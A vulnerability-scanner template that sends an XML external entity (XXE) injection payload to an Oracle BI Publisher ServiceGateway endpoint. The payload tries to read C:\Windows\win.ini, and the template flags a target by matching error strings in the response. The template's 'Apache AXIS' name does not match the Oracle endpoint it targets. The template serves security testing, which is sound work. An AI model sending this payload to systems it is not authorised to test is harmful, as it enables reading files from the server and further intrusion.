id: apache-axis-xxe
info:
  name: Apache AXIS XXE (CVE-2016-3473)
  risk: High


params:
  - root: '{{.BaseURL}}'

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/xmlpserver/services/ServiceGateway
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: text/xml
      - SOAPAction: '#replyToXML'
    body: |
      <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">   <soapenv:Header/>   <soapenv:Body>      <ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">         <incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % payload SYSTEM "file:///C:\Windows\win.ini"><!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///%payload;">'> %param1; %external;]>]]></incomingXML>      </ser:replyToXML>   </soapenv:Body></soapenv:Envelope>
    detections:
      - >-
        StringSearch("response", "<faultstring>") && StringSearch("response", "java.io.FileNotFoundException")


references:
  - links:
      - https://medium.com/@osama.alaa/xxe-injection-in-oracle-application-server-11g-cc05f6ab55ab
      - https://www.exploit-db.com/exploits/40590